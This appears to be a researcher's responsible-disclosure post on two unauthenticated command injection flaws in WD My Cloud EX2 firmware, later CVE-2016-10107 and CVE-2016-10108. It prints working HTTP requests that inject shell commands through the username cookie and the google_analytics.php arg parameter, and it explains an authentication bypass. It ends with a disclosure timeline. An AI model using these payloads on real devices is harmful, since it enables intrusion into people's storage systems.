The software version of my device is 2.11.142 and my device says that it’s up to date.
The first command injection vulnerability is in the home page URL, “/” in index.php Cookie. To detect successful exploitation I started Wireshark and watched for the pings sent to my IP address from the device.
GET / HTTP/1.1 Host: wdmycloudex2 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1
I deleted the PHPSESSID from the cookie and it still worked without any authentication.
The next one was in the /web/google_analytics.php URL.
POST /web/google_analytics.php HTTP/1.1 Host: wdmycloudex2 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: application/xml, text/xml, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://wdmycloudex2/ Content-Length: 52 Cookie: isAdmin=1; username=admin; username=admin; local_login=1; fw_version=2.11.142 Connection: close cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23
I was also able to exploit this one unauthenticated on the LAN by deleting the PHPSESSID from the cookie and replaying the request from a different computer.
I submitted the vulnerabilities to Western Digital on 10/8/2016 and received word that they released a firmware update to remediate on 12/13/2016. These vulnerabilities have been submitted to Mitre for CVE assignment.
Update 1/3/2017: Mitre assigned CVE’s CVE-2016-10107 and CVE-2016-10108.
Update 1/10/2017: I received two new emails from Western Digital after the one they sent on 12/13/2016 telling me they released a firmware patch. They only patched 2016-10108.